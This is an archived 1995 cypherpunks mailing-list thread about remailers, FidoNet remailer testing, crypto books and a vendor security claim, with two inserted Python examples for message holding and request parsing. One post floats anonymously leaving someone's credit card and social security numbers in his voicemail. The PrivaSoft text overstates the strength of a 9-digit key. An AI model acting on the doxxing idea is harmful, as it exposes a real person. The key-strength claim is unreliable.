>Received: from nova.unix.portal.com by toad.com id AA06198; Wed, 18 Oct 95
>09:38:02 PDT
>Received: from jobe.shell.portal.com (jobe.shell.portal.com [156.151.3.4])
>by nova.unix.portal.com (8.6.11/8.6.5) with ESMTP id JAA01733 for
><cypherpunks@toad.com>; Wed, 18 Oct 1995 09:36:59 -0700
>Received: (hfinney@localhost) by jobe.shell.portal.com (8.6.11/8.6.5) id
>JAA17879; Wed, 18 Oct 1995 09:36:58 -0700
>Date: Wed, 18 Oct 1995 09:36:58 -0700
>From: Hal <hfinney@shell.portal.com>
>
>Now, by convention, we don't treat the _intermediate_ steps in the same way
>that we treat the "From: Hal <hfinney@shell.portal.com>" step. So, why do
>many treat _remailers_ as originators?
>
>Mostly, it's education. People get a message from "remailer@kremvax.org"
>and they are trained to think this is the sender. Or, they are trained to
>think they can send a message back to this site, or to "root@kremvax.org"
>complaining about the mail they received and expecting that something will
>be done to make it stop. But trying to educate people that a remailer is
>not the same as a sender is likely to be a long and disappointing process.
>A better approach is needed.
>
>I believe that by changing the nature of remailers and making them much
>more explicitly like messengers, couriers, and delivery services, that we
>can win the public relations battle. There may still be legal challenges,
>but at least the semantics will not be so confusing. Just as Willis Ware
>made the point to Michael Froomkin about the confusing and misleading
>semantics of "escrow," I believe the same is true of the confusing and
>misleading semantics of "remailer." Perhaps we should just change the name
>from "remailer" (or "mix") to "Message Delivery Services." Perhaps some of
>you can think of a shorter and catchier term that still makes the messenger
>role clear.
>
>
>(I hang out on the Cyberial mailing list for cyberspace law discussions, so
>I am well aware that any change such as I am suggesting must also be tested
>as a legal strategy, and that conceptual ideas may not hold water, legally.
>I won't address legal issues here, at least not now.)
>
>The idea is to make it much more explicit that a remailer is merely
>_delivering_ a message. Few people hold their local postal carrier
>responsible for delivering a letter containing "bad material," be they
>threats, hate speech, unwanted pornography, etc. Likewise, package delivery
>services are generally not held responsible. And telephone answering
>services are not treated as the authors of, say, threatening messages, when
>they pass on messages such as:
>
>"Tim, you received a call at 4:15 p.m. saying that if you continue with your
>project to collect reports of NSA visits to software companies that some
>guys dressed in blue suits will try to run you down in your parking lot."
>
>In these cases, we don't kill the messenger. We don't even sanction the
>messenger. And it's more than just that we treat the messenger as being
>ignorant of the contents, as the telephone message service example shows:
>there are several examples I can think of immediately in which harmful or
>hateful speech is relayed to someone with no expectation that the relayer
>will face sanctions.
>
>This is much more than the oft-cited doctrine of "common carrier" status,
>where the government (it is claimed) grants to the phone company certain
>rights and responsibilities with the proviso that it will not hold them
>liable for the _content_ of phone calls. (I'm not sure if Federal Express
>is treated as a "common carrier," but I'm fairly certain they are not held
>liable for various evils delivered in sealed packages, with certain obvious
>exceptions involving cooperation with law enforcement.)
>
>I'm not a lawyer, but I believe the law recognizes (and has for a long
>time) that the messenger of bad or harmful news, or mail, etc., is not to
>be held liable. There are oft-debated examples involving a newspaper
>editor's responsibility not to "relay" libelous material, and so forth, but
>these are not cases of mere couriers or messengers.
>
>(Counterpoint: And yet couriers who knowingly transport drugs of course
>face sanctions. This is a case where the possession (and hence transport)
>itself is illegal. This involves scienter--awareness--of what is being
>transported, in a way that delivery of an encrypted message clearly could
>not. Or even unencrypted messages, if the messenger could make a plausible
>claim that he does not look at or screen messages. Lots of issues to
>discuss.)
>
>
>A MAIL DELIVERY SERVICE (don't we already have them? yes, but....)
>
>So, how would this work?
>
>With remailers, even more steps need to be taken to make it absolutely
>clear that the delivered message is not _from_ the last Internet site that
>shows up in the "From:" field. More than just disclaimers are needed.
>
>One approach is for a _notification-based_ system. To wit:
>
>"You have a piece of mail awaiting at our mail delivery service. The
>originator is unknown. The title of the message is "Tentacles of Medusa
>Must Die!" You may retrieve this message by replying to this notification
>with the word "Yes" anywhere in the Subject field. This message will be
>kept for 60 days and then deleted."
>
>The idea being to more carefully distinguish between mere messengers and
>the "From:" field (not that "From:" establishes origin, as we all know from
>the whole point of remailers, but most people associate "From:" with an
>actual originator, wherein lies the problem).
>
>It would also lessen complaints from people who suddenly find unwanted mail
>arriving anonymously. People would have to make at least some token effort
>to "accept delivery."
>
>Similarities to "general delivery" mail delivery are obvious, as are
>similarities to fee-based mail forwarding services and "Mailboxes Etc."
>services.
>
>(By the way, and not to digress again, but I see systems like this as the
>likely future of mail. Some scheme where a user chooses to accept or reject
>delivery--as with packages delivered which one can refuse delivery on--is
>needed to solve several problems: mailbombs, unwanted illegal material
>arriving, the sheer flood of mail, etc. And with people moving around,
>changing companies, wanting anonymity, etc., such mail service sites will
>be a natural fit. Having them add filtering services, a la MailWeir, is one
>obvious service.)
>
>This could be implemented as a new type of remailer. This could also
>integrate with paid delivery systems, a la digital postage. (I can imagine
>some people demanding to be paid some small amount to receive a
>message....this is not feasible with the current "free delivery" model, but
>a lot of things are not possible with "free delivery." But I digress.)
>
>I'll quit for now. Lots of issues.
>
>"Don't kill the messenger."
>
>
>--Tim May


I like the Mail Delivery Service idea combined with user selectable
filters.

I would also like to see the merging of different message transmission
technology using gateways.  We have gateways... Fidonet to/from internet,
email to newsgroup, and Telegram to (snail) mail.  Would it not be
beneficial to add other gateways such as email to snail mail, email
to fax, fax to email, snail mail to email, and CB to email.

Remailers are in place in the RF world.  They are called repeaters or
transponders.  They perform the function of taking a weak signal and
boosting its power so that a larger group of receivers can pick up the
signal.  Ham radio has (vhf ?) repeaters in metropolitan areas.  Satellites
use transponders allowing the signal to be sent from horizon to horizon.
(This already has potential problems.  Hughes is coming out with a
product called DirectPC. I believe it allows you to transmit over a slow
modem but receive high data rates from a satellite.  I guess if you just look
at or edit some crypto source code from your shell account, it would be exported
as far as the satellite horizon as a byproduct of being sent to your display.)

Does it not make sense for some kind of listening post to be set up to
take messages sent via Satellite, Ham radio, or CB and either place them
in a newsgroup or an archive site or a mail delivery service?  Transmitting
your anonymous e-mail by CB would be kind of nice.

Some of these RF modes are highly regulated. I believe that Hams
already have packet radio but cannot encrypt data and are accountable
for all the data being sent on their transmitter.  CB seems less regulated,
perhaps because of its limited power and range. (This would change
with an internet repeater.)

I don't know about satellite regulation, but recall some CNN broadcast out
of Baghdad with a portable transmitter during Desert Storm.  Perhaps that kind
of equipment will be cheap and available in the future.  Is public access
limited to cable?

-Tom Rollins <trollins@hns.com>





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Fri, 20 Oct 95 12:53:12 PDT
To: cypherpunks@toad.com
Subject: Re: Don't Kill the Messenger--A New Slant on Remailers
Message-ID: <acad483845021004366c@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 6:45 PM 10/20/95, Rev. Mark Grant wrote:
>On Thu, 19 Oct 1995, Timothy C. May wrote:
>
>> "You have a piece of mail awaiting at our mail delivery service. The
>> originator is unknown. The title of the message is "Tentacles of Medusa
>> Must Die!" You may retrieve this message by replying to this notification
>> with the word "Yes" anywhere in the Subject field. This message will be
>> kept for 60 days and then deleted."
>
>I suspect that I could easily hack this into Mixmaster in a day or two,
>but wouldn't it open you to attacks where Anonymous Fed, say, sends
>terrorist kiddy-porn through your remailer and busts your ISP during those
>60 days for possession ? I'm not sure if it would be better or worse than
>current setups from that point of view.

In the U.S. at least, the Electronic Communications Privacy Act (ECPA) says
that e-mail should not be looked at by third parties to a communication.
Yes, there are all sorts of wrinkles, such as whether an employer may look
at employee e-mail, blah blah. But I suspect the ECPA adequately protects a
mail deliverer against charges such as Mark describes.

("But under the ECPA I am not allowed to look at this e-mail, so how can I
be held liable for it?" Not even under Stratton-Oakmont is the deliverer or
holder of e-mail held liable for content or effects--the Prodigy case
involved the fact that Prodigy was moderating/censoring speech in public
forums, so, the judge averred, Prodigy could not claim it had no duty to
moderate or censor the speech of defamers. Roughly, as IANAL.)

>I might do it anyway, and set it up to only forward PGP-encrypted
>messages, but I certainly wouldn't be able to keep messages for 60 days
>with only a MB or so to spare.

Drives are cheap. I just saw a 1.2 GB for $195 (internal, PC). I suspect
that anyone sweating over having only a MB to spare shouldn't be running a
remailer.

(Not a slam against Mark, just a statement that there are certain minimal
capabilities I'd expect to see, and not having free disk space is a serious
problem.)

In any case, by the time "General Delivery Remailers" would be spreading,
disk space will be even cheaper. And a coupon- or stamp-based remailer
could of course then buy disk space as needed.

(If a 1000 MB drive costs $300 and is written off over 3 years, then the
storage cost is $0.10 per megabyte-year. For the average text message of
about 20 KB, the cost to store it a year is $0.002. The cost to store it
for 60 days is 6 times less. Even if disk drives cost more than I've
quoted, the cost is tiny, tiny, tiny. Connection costs are likely to
dominate. Large files may be a different matter--the math is easy to
do--but these are seldom the targets of remailers to unsuspecting parties.
In any case, easy to "expire" unretrieved larger files faster.)

--Tim May

Views here are not the views of my Internet Service Provider or Government.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
Corralitos, CA              | knowledge, reputations, information markets,
Higher Power: 2^756839      | black markets, collapse of governments.
"National borders are just speed bumps on the information superhighway."

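The hold-and-notify delivery discussed in this message, sketched as an added example (not code from the thread, from Mixmaster or from any remailer). The 60-day retention, the "Yes" reply and the $0.10 per megabyte-year figure come from the posts; the pickup token, the addressee check, the 7-day limit for large messages and the 1 MB threshold are assumptions.

```python
"""Hold-for-pickup remailer queue: notify first, deliver only on acceptance."""
import re
import secrets
from dataclasses import dataclass
from datetime import datetime, timedelta

RETENTION = timedelta(days=60)        # from the notification text in the thread
LARGE_RETENTION = timedelta(days=7)   # assumption: large files "expire" faster
LARGE_BYTES = 1_000_000               # assumption: what counts as "large"
COST_PER_MB_YEAR = 0.10               # $300 / 1000 MB / 3 years, as in the post


def _clean(title: str) -> str:
    """Untrusted title goes into our own notice: drop control characters."""
    return re.sub(r"[\x00-\x1f\x7f]+", " ", title)[:120]


@dataclass
class Held:
    recipient: str
    title: str
    body: bytes
    received: datetime

    @property
    def expires(self) -> datetime:
        keep = LARGE_RETENTION if len(self.body) > LARGE_BYTES else RETENTION
        return self.received + keep


class HeldMailStore:
    def __init__(self):
        self._held = {}  # pickup token -> Held

    def deposit(self, recipient, title, body, now):
        """Store a message; return (token, notification text to send)."""
        token = secrets.token_hex(8)  # unguessable, ties a reply to one message
        msg = Held(recipient, _clean(title), body, now)
        self._held[token] = msg
        days = (msg.expires - now).days
        notice = (
            f"Subject: Mail awaiting pickup [{token}]\n\n"
            "You have a piece of mail awaiting at our mail delivery service. "
            f'The originator is unknown. The title of the message is "{msg.title}". '
            "You may retrieve this message by replying to this notification "
            'with the word "Yes" anywhere in the Subject field. '
            f"This message will be kept for {days} days and then deleted."
        )
        return token, notice

    def accept(self, sender, reply_subject, now):
        """Return the held body if this reply is a valid acceptance, else None."""
        m = re.search(r"\[([0-9a-f]{16})\]", reply_subject)
        if not m:
            return None                       # reply does not name a message
        msg = self._held.get(m.group(1))
        if msg is None or now >= msg.expires:
            return None                       # unknown, picked up, or expired
        if sender.lower() != msg.recipient.lower():
            return None                       # only the addressee may accept
        if not re.search(r"\byes\b", reply_subject, re.IGNORECASE):
            return None                       # no explicit acceptance
        del self._held[m.group(1)]            # deliver once, then forget
        return msg.body

    def purge(self, now):
        """Delete everything past its retention period; return count removed."""
        dead = [t for t, m in self._held.items() if now >= m.expires]
        for t in dead:
            del self._held[t]
        return len(dead)

    def pending(self):
        return len(self._held)


def storage_cost(size_bytes, days):
    """Dollar cost of holding size_bytes for `days` at COST_PER_MB_YEAR."""
    return COST_PER_MB_YEAR * (size_bytes / 1_000_000) * (days / 365)


if __name__ == "__main__":
    t0 = datetime(1995, 10, 20)               # constructed sample data
    store = HeldMailStore()
    tok, notice = store.deposit("alice@example.org",
                                "Tentacles of Medusa Must Die!", b"x" * 20_000, t0)
    print(notice)
    print(store.accept("alice@example.org", f"Re: [{tok}] Yes", t0))
    print(f"${storage_cost(20_000, 60):.6f} to hold 20 KB for 60 days")
```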





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: pcw@access.digex.net (Peter Wayner)
Date: Fri, 20 Oct 95 11:34:01 PDT
To: cypherpunks@toad.com
Subject: _Digital Cash_ info...
Message-ID: <acad9de601021004d1dd@[199.125.128.5]>
MIME-Version: 1.0
Content-Type: text/plain



As John Young noted the other day, the publisher is finally shipping my
book called _Digital Cash_. If you're curious, you can see the table of
contents from my home page:

 http://access.digex.net/~pcw/pcwpage.html

You should be able to get the book at fine bookstores like Computer
Literacy or through the publisher's 800 number (1-800-3131-APP). If you
like, you can order the book directly from me at the list price of $34.95.
Shipping is free. You can either snail mail me a check or get a First
Virtual account.

Let me know if you have any questions or comments. I would like to thank
the many members of the cypherpunks mailing list who contributed to my
knowledge in the subject. Really. Thanks.

-Peter Wayner






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Dana W. Albrecht" <dwa@corsair.com>
Date: Fri, 20 Oct 95 14:54:58 PDT
To: hallyn@cs.hope.edu
Subject: Re: textbooks
Message-ID: <199510202149.OAA28734@elmos.corsair.com>
MIME-Version: 1.0
Content-Type: text/plain


 

Perry writes: 
> Kenshiro writes:
> > I am planning to take an independent study course in cryptography.  A
> > professor here is interested in doing it with me, but neither he nor any
> > other faculty members at this school is very knowledgeable about
> > cryptography (hence his interest :).  I am looking for good (technical)
> > books on cryptography which would work well as textbooks for undergraduate
> > computer science majors with scant knowledge of number theory.
> 
> The right place to start is the new edition of Bruce Schneier's book,
> Applied Cryptography, which will be coming out within a month. The old
> edition will probably do until then. There are a number of other
> books, but Bruce's is the One Stop Shopping center, and you can spend
> years dredging up the things in the bibliography.
> 
> For flavor and motivation, you might also want to read the (unabridged
> hardcover -- not paperback!) version of "The Codebreakers" by David
> Kahn. I read this book as a child and I suppose it got me interested
> in crypto for life -- the funny thing is, it appears that the same
> experience inspired Whit Diffie to go off and co-invent Public Key
> Cryptography, so it is probably a history maker. However, I'll note
> that it's fluffy -- all it will do is give you a solid perspective on
> how hard it is to do this stuff right and how important it is.
 
I also suggest "A Course in Number Theory and Cryptography, 2nd Edition"
by Neal Koblitz, published by Springer Verlag.

"Applied Cryptography" is certainly the book of choice, but Koblitz
is an excellent secondary reference for covering a lot of the relevant
mathematics in more depth.

In my opinion, "Applied Cryptography" was written from the perspective
of computer science, "The Codebreakers" was written from the perspective
of history, and Koblitz's book was written from the perspective of
mathematics.

They are all nicely complementary.

Dana W. Albrecht
dwa@corsair.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Steve Bryan <sbryan@maroon.tc.umn.edu> (Steve Bryan)
Date: Fri, 20 Oct 95 12:52:21 PDT
To: cypherpunks@toad.com (Cypherpunks Mailing List)
Subject: Re: PGP interface for Mac--well...
Message-ID: <v02130501acadad5205fd@[204.221.10.130]>
MIME-Version: 1.0
Content-Type: text/plain


>Has anyone seen this yet? The only upload I've seen, on info-Mac,
>unbinhexes into something called "My Preschool Demo," and that's pretty
>much what it is.
>
>http://hyperarchive.lcs.mit.edu/HyperArchive/Archive/cmp/
>                mac-pgp-control-10b1-as.hqx
>

Well I tried the next obvious place and it is actually there. Look at: 

/info-mac/app/edu/preschool-program-10-demo.hqx

 Voila, your pre-schooler is playing with MacPGP. Actually you're not quite home free yet. Right now I'm trying to use Anarchie to hunt down FaceSpan Extension v2.0.1. The specific URL given in the docs points to a rather unresponsive host.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: patrick@Verity.COM (Patrick Horgan)
Date: Fri, 20 Oct 95 15:05:28 PDT
To: cypherpunks@toad.com
Subject: The Dr. Fred scandal
Message-ID: <9510202201.AA15501@cantina.verity.com>
MIME-Version: 1.0
Content-Type: text/plain


I feel moved to make a couple of comments.

o Dr. Fred did get over the edge.  His communication style had little to
  recommend it.
o He did make some good and useful comments along with some others.
o Some people posting anonymously and otherwise took out of context
  quotes in an apparently mean-spirited way and slammed the guy.
o Dr. Fred reacted
o Others reacted
o Some people took private email from Dr. Fred and quite unethically replied
  publicly on this list without his permission.
o I see both sides as owing this list apologies.
o There are two sides to this whole thing.

Fred brought up some concerns about possible holes in software just as many
of us have.  Most of the time things like this result in good discussions on
this list and consensus is reached about the holes existing or not and
the extent of the holes.  Because of Dr. Fred's presentation, he quickly
alienated people, and what little discussion there was about his theories
was lost in the noise.

We'd do better to let it drop.  In the future if someone really annoys you
in the way they present something, perhaps it would help more if you sent
them private email noting that their communication skills are working 
against them and giving them some helpful pointers about how they could have
done things differently.  That way you'll be part of the solution instead
of part of the problem.  It's easier to get your dander up and express 
your annoyance publicly, but that affects all the rest of us.

Patrick
   _______________________________________________________________________
  /  These opinions are mine, and not Verity's (except by coincidence;).  \
 |                                                       (\                |
 |  Patrick J. Horgan         Verity Inc.                 \\    Have       |
 |  patrick@verity.com        1550 Plymouth Street         \\  _ Sword     | 
 |  Phone : (415)960-7600     Mountain View                 \\/    Will    | 
 |  FAX   : (415)960-7750     California 94303             _/\\     Travel | 
  \___________________________________________________________\)__________/




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Ray Cromwell <rjc@clark.net>
Date: Fri, 20 Oct 95 12:19:49 PDT
To: chip@communities.com (Chip Morningstar)
Subject: Re: 50 attacks on Netscape - please send the check
In-Reply-To: <9510190047.AA14597@ communities.com>
Message-ID: <199510201919.PAA20537@clark.net>
MIME-Version: 1.0
Content-Type: text/plain


> 
> fc@all.net (Dr. Frederick B. Cohen) writes:
> >50 Attacks: a.k.a. Why Not to Run Hot Java in your netscape (or other) browser:
> > ... (drivel elided)
> 
> This fellow seems to be systematically (if not deliberately) ignorant
> about these things.

  I'm frequently seeing this same behavior by lots of people on
this list and it's sad. There are people making claims about
HotJava/Java that are obviously bogus if you even read the white paper,
looked at the source code, or programmed a "Hello World" applet.
The Java papers are an easy read.   If you want to know about the
implementation, read the source. At least criticize specifics about
the implementation rather than speculating what they are and then
proceeding to claim to have found a security hole in the implementation.
I'm even more surprised when I see someone with a PhD acting like
this.

-Ray





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Richard Charles Graves <llurch@networking.stanford.edu>
Date: Fri, 20 Oct 95 15:22:31 PDT
To: cypherpunks@toad.com
Subject: Automatic File Wipe Utils for Win95?
Message-ID: <199510202222.PAA21700@Networking.Stanford.EDU>
MIME-Version: 1.0
Content-Type: text/plain


Prescript: No, I am not affiliated with any government agency in any way.

-----BEGIN PGP SIGNED MESSAGE-----

A government agency is looking for something to ensure that files copied
from a Windows 95 machine do not contain any data from unused space on the
hard drive. I'm curious too.

Perhaps a command.com hack that zeroes out any bits outside the actual
file? The problem is that existing utilities do not work because Win95
disables direct disk access to preserve VFAT. A delete utility is not
sufficient, because they are also worried about temporary files created by
Win95 programs. 

- -rich
 llurch@networking.stanford.edu

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMIgf7Y3DXUbM57SdAQEThgQAnEWB7HI2yoxiFCdosQTNG/WxiBLkqTvJ
FSf3ni7ThmHSx7acp2KueevIRcrFw89JaGj1gPH68irZj8Vh8PEP1uopQJw+QWDo
A5NsTPiZnDooXN+svGNo1KH0k36+73xXh5wybXzKFgwHWz9X4RtE+lZdJ9JDf1z7
O8IT0zG6nqc=
=NSyb
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rich Graves <llurch@networking.stanford.edu>
Date: Fri, 20 Oct 95 15:57:19 PDT
Subject: Voicemail Security
In-Reply-To: <46775j$2tg@news.eecs.nwu.edu>
Message-ID: <Pine.ULT.3.91.951020153438.21479D-100000@Networking.Stanford.EDU>
MIME-Version: 1.0
Content-Type: text/plain


Please see article <46775j$2tg@news.eecs.nwu.edu> in 
news.admin.net-abuse.misc. It has also been cross-posted elsewhere.

I wonder how often Jeff checks his messages. It would be interesting, from
a purely academic perspective of course, to see if one could anonymously
drop off more information about Jeff and his clients at that number for
private distribution. For example, credit card, driver's license, and
social security numbers. I assume that Jeff is reading this group. 

How would Jeff go about protecting his voicemail box from this sort of
attack? How would *I* go about protecting *my* voicemail box from this 
kind of attack? 

-rich
 Whose list was also spammed, but only I got it because majordomo is set
 to bounce all messages from non-subscribers to the list owner. Btw, is
 this list set up this way?




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim.Cannell@f21.n216.z1.fidonet.org (Jim Cannell)
Date: Sat, 21 Oct 95 02:35:43 PDT
To: cypherpunks@toad.com
Subject: FidoNet Remailer
Message-ID: <a7c_9510210301@nisc.fidonet.org>
MIME-Version: 1.0
Content-Type: text/plain



=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

-----BEGIN PGP SIGNED MESSAGE-----

I have been a long time lurker on this list, as well as having a long time
interest in crypto.  Most of my activity in this area has been on FidoNet
rather than the internet.  Due to the control phreak nature of much of
FidoNet, I've spent a lot of time and effort in an attempt to just simply
route around the bastards.  I created the SecureMail system, which is a
network of FidoNet nodes that agree to route any and all traffic without
monitoring or censorship.  Within SecureMail, encrypted traffic is not
only permitted, it is encouraged.

Which brings me to the point of this message.  I have written an anonymous
remailer program for FidoNet.  It is currently running on my FidoNet node
in an alpha test mode.  It has only been running a couple of weeks, and
seems to be doing quite well.  I have just added internet addressability
to it.  What this means is that now anonymous messages can be remailed
between FidoNet and the internet.  Having still another routing path should
further decrease the traceability of these messages.

I would like to ask the cypherpunks to help me test the remailer across
the gateway.  Please send many messages through this remailer from both
the FidoNet and the internet side of the gateway.  Try to break it.  I
want a good reliable piece of software, and if it can survive attempts
by this group to break it, there will be a lot more confidence in it.

Following are instructions for using the FidoNet remailer:

- From FidoNet, send your message to Remail at 1:216/21.  From the internet,
send your message to: remail@f21.n216.z1.fidonet.org

In all cases, the first text line of the message must contain a double
colon.  The second line contains the remail command, and the third line
is blank.  The actual text to be remailed starts on line 4.


To send a message to Joe Sixpack at FidoNet address 1:102/903, enter:
::
remail-to: Joe Sixpack @ 1:102/903.


To send a message to an internet address, enter:
::
remail-to: tcmay@got.net

(Sorry, Tim -- couldn't resist using you as an example :-) 


To get a short help file, enter:
::
help


To post a message to the FidoNet SYSOP Echo, enter:
::
remail-to: SYSOP



I'll welcome discussions of this remailer on the list, or in private mail.
Bug reports and/or comments are encouraged.  I can be reached at
Jim.Cannell@f21.n216.z1.fidonet.org


BTW, I will be at the cypherpunks meeting in Anguilla next week.  Hope to
meet some of you there.



Jim - International SecureMail Host (ISMH)
PGP key 1024/B7822B3D
fingerprint =  0F F4 79 06 3B 33 99 D1  07 36 66 66 80 85 76 B3

Protect your right to privacy. Say no to GAK.

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMIg6pSWTIMO3gis9AQEKLQP/TVodxgTJiik3KQK1C8QgSp/O3wzdxi+P
eC2flE6qgtlmwh6X4vbBNTmj4bKAfGLgbJyvdcMAZCESYab1dxO8q1lwOAnayW8d
qoSRhL+zT0KepmV5FXyLscq+SbzgxKoX3gkWgHlhrhHbmycr3rFGLKz6ZsoR/xmb
WX16LX2JVFk=
=vBaR
-----END PGP SIGNATURE-----
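A strict parser for the request format described in this message (`::` on line 1, the command on line 2, a blank line 3, text from line 4), given as an added example that is not the remailer's own code. The destination patterns (36-character name limit, optional point number, tolerated trailing period, upper-case echo tags), the skipping of leading blank lines and the rejection of control characters are assumptions made for the sketch.

```python
"""Parse and validate a '::' remail request before anything is forwarded."""
import re
from dataclasses import dataclass

# Assumed destination shapes, modelled on the three examples in the message.
FIDO_RE = re.compile(
    r"^(?P<name>[^@]{1,36}?)\s*@\s*"
    r"(?P<zone>\d{1,5}):(?P<net>\d{1,5})/(?P<node>\d{1,5})"
    r"(?:\.(?P<point>\d{1,5}))?\.?$"
)
INET_RE = re.compile(r"^[A-Za-z0-9._%+-]+@[A-Za-z0-9-]+(?:\.[A-Za-z0-9-]+)+$")
ECHO_RE = re.compile(r"^[A-Z0-9_.-]{1,32}$")


class FormatError(ValueError):
    """The request does not follow the documented four-line layout."""


@dataclass(frozen=True)
class Request:
    kind: str      # "help", "fido", "internet" or "echo"
    target: tuple  # parsed destination; () for help
    body: str      # text to be remailed (line 4 onward)


def parse_request(text: str) -> Request:
    lines = text.replace("\r\n", "\n").split("\n")
    while lines and not lines[0].strip():   # assumption: gateways may prepend blanks
        lines.pop(0)
    lines += [""] * max(0, 3 - len(lines))
    if lines[0].strip() != "::":
        raise FormatError("line 1 must be '::'")
    command = lines[1].strip()
    if lines[2].strip():
        raise FormatError("line 3 must be blank")
    # A stray CR or other control byte here could become an extra header
    # once the request is gatewayed to internet mail, so refuse it outright.
    if any(ord(c) < 32 or ord(c) == 127 for c in command):
        raise FormatError("control character in command line")
    if command.lower() == "help":
        return Request("help", (), "")

    key, sep, dest = command.partition(":")
    if not sep or key.strip().lower() != "remail-to":
        raise FormatError("unknown command")
    dest = dest.strip()
    body = "\n".join(lines[3:])
    if not body.strip():
        raise FormatError("nothing to remail")

    m = FIDO_RE.match(dest)
    if m:
        target = (m["name"].strip(), int(m["zone"]), int(m["net"]),
                  int(m["node"]), int(m["point"] or 0))
        return Request("fido", target, body)
    if INET_RE.match(dest):
        return Request("internet", (dest,), body)
    if ECHO_RE.match(dest):
        return Request("echo", (dest,), body)
    raise FormatError("unrecognised destination")


if __name__ == "__main__":
    # Constructed sample requests following the instructions in the message.
    samples = [
        "::\nremail-to: Joe Sixpack @ 1:102/903.\n\nHello Joe\n",
        "::\nremail-to: tcmay@got.net\n\nHello Tim\n",
        "::\nremail-to: SYSOP\n\nHello sysops\n",
        "::\nhelp\n",
        "::\nremail-to: SYSOP\nbody started one line early\n",
    ]
    for s in samples:
        try:
            print(parse_request(s))
        except FormatError as e:
            print("rejected:", e)
```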





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Simon Spero <ses@tipper.oit.unc.edu>
Date: Fri, 20 Oct 95 16:36:52 PDT
To: cypherpunks@toad.com
Subject: The trial of the century?
Message-ID: <Pine.SOL.3.91.951020163031.14469C-100000@chivalry>
MIME-Version: 1.0
Content-Type: text/plain



Any reports on today's outing to the Bernstein case? Any gifs of courtroom 
sketches to upload?

Simon
-----
Johnny Cochran - Sears spokesman: 
    "If it doesn't fit, you can take it back and change it."




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: anonymous@freezone.remailer
Date: Fri, 20 Oct 95 13:40:36 PDT
To: cypherpunks@toad.com
Subject: [reformatted] how secure can privasoft be?
Message-ID: <199510202040.QAA29119@light.lightlink.com>
MIME-Version: 1.0
Content-Type: text/plain


here's a version with eighty character lines:

============================================================================

How Secure Can PrivaSoft Be?


Introduction

PrivaSoft is a communication security product, and the user is entitled to
know how secure it is.  This document addresses the question of cryptographic 
strength of PrivaSoft.

Export license regulations

In some advanced countries, cryptographic products are categorized as 
"munitions" and their use, sale or exportation is controlled by local 
licensing regulations.  PrivaSoft has obtained an export license from the 
governments of Israel and the USA.  Licenses in other countries are obtained 
in coordination with the local distributors.  

The typical policy is to limit the allowable cryptographic strength of 
commercial products to a level that is strong enough for commercial purposes.  
The basic intention of this regulation is to protect the state from abuse of 
too strong cryptographic products by terrorists and criminals.  Some countries
do not practice such law because it is viewed as a denial of freedom of 
expression.  PrivaSoft willfully complies with these regulations as it is a 
commercial product, and it is not intended for national security applications 
with its current key length which is the maximum legally allowable for 
commercial users.

The cryptographic engine of PrivaSoft

PrivaSoft uses a pseudo-random generator that is seeded by a 9 digit number 
uniformly normalized from the user's secret key.  The engine is proprietary, 
designed according to the rules of modern cryptology to make the best use of 
the allowable key length.

Like other dependable cryptographic engines, the structure of the encryption 
software can be disclosed without compromising the security of the user.  
However, the coding and specific parameters of the mechanism are considered a 
trade secret and will be disclosed for the purpose of cryptoanalytic 
validation when necessary and under an appropriate non-disclosure non-
competition agreement.

The use of default keys

When secret keys or passwords are used by laymen, there is always a conflict 
between security and convenience:  The user tends to use fixed, easily 
memorized keys again and again, while the cryptoanalyst only waits for an 
opportunity to see many messages encrypted by the same key.  PrivaSoft, being 
a secure commercial product must live in peace with both - allow the user to 
use a repetitive, default key, and deny the cryptoanalyst the pleasure of 
having many messages encrypted by one key.  This is done by using the pseudo-
random "key extension" feature which is described in the PrivaSoft user's 
guide.

The information contents of a clear message

If a cryptographic product is properly designed, then the almost only way to 
crack it is to try all possible keys.  If the process is done by a computer, 
the "cracking" software must be taught to tell the correct key from the 
wrong keys.  This can only be done if there are some properties of the 
decrypted message that are known a priori.  With the PrivaSoft analogue 
graphical encryption, and with the naturally noisy fax images, a significant 
portion of the page must be reconstructed, and a significant amount of 
mathematical correlation must be calculated between neighboring areas of the 
image, before the cracking software can tell whether the candidate key is 
wrong.  This makes the cracking process much slower than in alphanumeric 
encryption of the text in a natural language.  The 9 digit key, when applied 
to analogue graphical encryption, is equivalent to a much longer key 
applied to alphanumeric encryption.  The cryptographically oriented user can 
make it very much harder by some smart pre-processing of the image prior to 
its encryption.  A simple example:  For a short message, increasing the font 
size of the text by a factor of 10 will significantly increase the time 
required for breaking the encryption.

Customized versions of PrivaSoft

PrivaSoft is unique in being a one-stop product that can serve all types of 
modern correspondence, including E-mail, fax and paper printouts.  Special 
applications that need and can obtain a license to use non-commercial 
cryptographic engines can be accommodated by special versions of PrivaSoft.  
The cryptographic engine can be customer-furnished and customer integrated, 
however - since in some areas the integration of this product with certain 
cryptographic engines may be considered "munitions", each customized version 
of the product has to be licensed separately in accordance with the laws of 
the territory where it was created and used.

==========================================================================




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: lyalc@mail.mpx.com.au (lyal collins)
Date: Fri, 20 Oct 95 00:11:59 PDT
To: cypherpunks@toad.com
Subject: Re: Postscript in Netscape
